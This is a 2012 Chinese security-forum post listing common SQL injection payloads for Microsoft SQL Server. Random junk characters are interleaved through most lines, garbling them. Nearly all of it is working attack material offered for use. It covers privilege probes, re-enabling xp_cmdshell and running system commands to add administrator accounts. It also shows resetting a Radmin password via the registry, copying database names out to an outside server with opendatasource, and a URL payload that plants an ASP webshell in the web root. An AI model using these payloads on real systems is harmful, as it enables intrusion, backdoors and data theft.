找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2008|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的/ Z7 ]0 I& ~9 w: ^. F
and 1=(Select IS_MEMBER('db_owner'))
: Y# e7 G- f& LAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
. ^: ]0 u  I" }. h3 t6 G0 T4 |$ a7 g
//检测是否有读取某数据库的权限
, z3 U3 Y6 u' d- u4 ^and 1= (Select HAS_DBACCESS('master'))+ k2 Y. H& L- \! o
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
9 i. A3 U( c8 J# M( d, n* r* a$ V, l+ h) q& {8 w. v
7 s. K, Z. s' [7 z
数字类型
5 h  a: x" k3 a1 h8 Oand char(124)%2Buser%2Bchar(124)=0* m1 r: k, Q  S* l- B+ p' E
7 X+ k% W$ @$ R, s4 I
字符类型
0 V9 h. \' q& g  F' and char(124)%2Buser%2Bchar(124)=0 and ''='" \. K6 ]1 `* @5 ?

8 y# P' f- F; r; l搜索类型
0 D  W/ y4 y- X' and char(124)%2Buser%2Bchar(124)=0 and '%'='
0 C1 t0 B% w0 F, F( P9 L* z( D  [0 }" [# h) V$ M
爆用户名
/ k. b/ d$ d. \. O8 |! k5 [and user>0
$ d( j8 E/ {3 Y/ s% [$ ~2 F4 Q' and user>0 and ''='
5 d# s  R+ X, G  a, }' R9 O3 y
! X1 F4 G1 N' W! {检测是否为SA权限& g: j9 W4 J1 ~8 Y
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--) v9 F8 N: c) ]4 k4 U. }" s/ d1 F
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --1 G2 o6 `" K& J

; ]* Q1 }& X$ e' _1 f检测是不是MSSQL数据库
8 i# a* H7 k8 R* n& land exists (select * from sysobjects);--
  d& P! R  Z2 J( r5 b" k* c; _  f- S5 `& Y2 k& ?# r# k3 c% c' {
检测是否支持多行. O( T& @8 o; ~9 k* C. ?" h$ N
;declare @d int;--
+ @) g# b7 X, u4 S/ |( `; [- T# i% J6 r& v
恢复 xp_cmdshell
) `, b5 H+ A1 @* u1 h;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
' C, Q4 N' }% S5 R. s
! E" Y, T* l5 l5 a, R7 }4 ]3 S' Z$ D2 M( W; P! a6 `
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
3 }. Y  r' M. x1 w1 u+ d  X, M4 ?+ ^! |! P2 t
//-----------------------# Q* M0 H, s- |3 h1 q6 ?
//       执行命令4 [2 o3 P# p3 [$ |( Q4 C, D- k: C
//-----------------------
" Z6 i; I( q% Q7 g5 J+ F  o首先开启沙盘模式:  x  }/ l5 x1 h' I' K" A
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1# Q8 a# ~1 e2 h- T# t7 M

7 p1 `: |+ P2 E8 I6 W0 H% A- a然后利用jet.oledb执行系统命令- G; Y6 u% a1 d# `/ S4 R$ i! n
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
$ o! P: d6 O# z+ @7 j1 h% z* T/ T1 y# J9 z+ |0 B- ]; t6 T
执行命令
& q/ |. @' B# h5 a  j) Z;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
3 d9 Q9 T6 j  x7 \! c# Y- z" k
$ ]- b4 t2 D6 X  f' o+ X+ kEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
$ p7 H. |. p; G& I! t0 U9 {# D7 N) L, T! K+ k
判断xp_cmdshell扩展存储过程是否存在:8 m/ f& A; o" Y% ~7 D' e
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')+ P% Z: _  R7 p6 P" ~; P

* C! H9 }. \5 a写注册表% M' k' P6 u0 S9 n  a! U4 h9 J# m
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1# ~4 I- v$ T+ x3 _; `1 [

  X% E5 t3 i& i4 wREG_SZ$ l9 e" h2 ~* K7 ~) T
: o3 w4 t4 x# k( e
读注册表/ J- l2 g3 S% z) E2 m0 G
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'7 E/ c' n: v$ _  d4 V; z8 A

/ h" O, S: l, A/ i0 ~+ S) u" m: c读取目录内容
% W/ }3 g5 F- n5 Yexec master..xp_dirtree 'c:\winnt\system32\',1,1& R& s$ b# e2 C: y/ u, `: @' j/ h
( x& y1 f  A5 U/ d3 X7 A

9 @' p7 ?4 v8 H( y1 P, S数据库备份" J  I5 H) Q# `0 h
backup database pubs to disk = 'c:\123.bak'
2 K7 q1 l( J) F5 E+ J2 H- K& g6 N: ]" r6 A1 D0 b3 t5 t
//爆出长度
' \+ u0 Y9 g$ d' H% s$ v5 pAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--. {5 U0 ]. i# z: M

4 b) K# ?- |, P, V3 V, T+ z$ X" B. L$ s# p
% s! z' P$ ]- D/ F. V
更改sa口令方法:用sql综合利用工具连接后,执行命令:
( F- I% Y- T7 ]/ g4 p5 k: D3 Vexec sp_password NULL,'新密码','sa': Z2 P7 w5 Y9 u* w$ H( e; o' C; z/ ?
% H$ _# O  O( [7 D# [" ~
添加和删除一个SA权限的用户test:
3 }' ^0 f* t! I8 }exec master.dbo.sp_addlogin test,9530772
! G" D! V9 M5 {) E$ j1 ?% texec master.dbo.sp_addsrvrolemember test,sysadmin
9 ^7 B* I$ t2 X6 \3 C* q/ V! f9 \& F* K: J1 O
删除扩展存储过过程xp_cmdshell的语句:/ ?/ t/ e: T$ N& \4 ?+ N3 S5 K
exec sp_dropextendedproc 'xp_cmdshell'
+ S  J2 U8 E" Z' s1 I3 L9 K- ~6 a+ E7 B+ a# \: u, `* j
添加扩展存储过过程
0 Q1 t  z" \7 \* C1 Z# A+ |EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'3 G, r% f. X0 n# |# t3 m
GRANT exec On xp_proxiedadata TO public) f4 Z- e; z/ b' K' v' B) z! J

: _7 A, h% Z% ]3 Q" r- ^& J. g
& B4 J# N* w' @7 E: H停掉或激活某个服务。
% v. K) z' }2 V( T; i3 h
3 T$ y0 s2 T; J' Iexec master..xp_servicecontrol 'stop','schedule'$ P; X8 C# k3 J  J
exec master..xp_servicecontrol 'start','schedule'
2 J' _, s& J6 }: [: x
* m3 e$ ?) F' X8 e/ E5 j& ^* N: ?dbo.xp_subdirs' w+ H: ]1 f& v5 k- I- M

. O$ M. r2 @7 U' q7 H' A只列某个目录下的子目录。
  ?; K1 J! I* ?  O# c: Hxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
. h) P' Y5 U- G  y3 [7 [3 q9 V6 y/ i3 B% c
dbo.xp_makecab
! {  R" E* K' W, G$ ]* A
4 @8 y' |" u6 M  |! Z. w/ \将目标多个档案压缩到某个目标档案之内。# X0 y# k# W/ p8 g' F9 F# w
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。' {) Q# |2 J' s; r$ j
  J& F! `' J! N: k4 S, M0 w
dbo.xp_makecab
4 ]% K7 C, i9 J2 B'c:\test.cab','mszip',1,
* C, X0 T* o2 _1 ]% ?% s/ J'C:\Inetpub\wwwroot\SQLInject\login.asp',
; k5 H) t; u5 j! j& \' L. J'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'" ]7 y+ d0 F% f* n& Z/ l2 |: [+ ]

: N3 K- |8 W( q! D) Txp_terminate_process( r: V' b; l( x% n4 H; _

+ P8 A0 U$ b  R9 c* s停掉某个执行中的程序,但赋予的参数是 Process ID。: m- A* N9 w" q; U/ J7 ^! g
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID% P/ C! X8 I& q+ q/ z- x9 ?
! J8 u! Y* q2 }) E! y. `
xp_terminate_process 2484
+ Y" {( Z# Y. ]8 J+ ?
! K  ^9 K0 d4 ]xp_unpackcab
% a# u3 i# S& \  {; p
" l7 N5 |( ?6 e' W+ ^4 m解开压缩档。% R% `+ d& R1 m  t" b$ [
  d* `+ u( ^- Z6 V1 l
xp_unpackcab 'c:\test.cab','c:\temp',1! v6 R7 |4 K: d# T5 c( t& {3 M

) U4 P  ]; r/ t/ e1 n( k5 q' H" o# k" f. M7 i2 [
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
5 \6 d* o! C: @# ~7 ]
* F- v6 k7 P' lcreate database lcx;' {3 F5 K: o% R* h" `
Create TABLE ku(name nvarchar(256) null);8 j1 W- _5 j3 J# T/ u1 S- `
Create TABLE biao(id int NULL,name nvarchar(256) null);
1 y3 H( P7 M/ |: I- P) E; L& t- C- I. m. C
//得到数据库名$ G6 z, ~6 g* B3 Z! ?) z
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases7 c7 b5 A- V0 G8 P; }1 f/ B
# {) {* z$ T% q

" b9 |5 |4 J# c! C& y+ }0 `//在Master中创建表,看看权限怎样& h8 g+ s6 B: _
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
" @. F1 q% O' R
& |  [( u7 ~8 _4 Y% i! C用 sp_makewebtask直接在web目录里写入一句话马:) v+ j* v9 p, M% f/ s: T
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--& |5 [: p! z; x7 i) H7 P2 F
. `# e) V9 z3 [0 G
//更新表内容9 n4 J' s+ ?8 h9 D* h2 e5 d
Update films SET kind = 'Dramatic' Where id = 123
. p: F! F5 @2 Y4 B7 v& ^8 U9 g1 C& g* v  w! l
//删除内容7 M8 K$ C( k3 s+ v
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表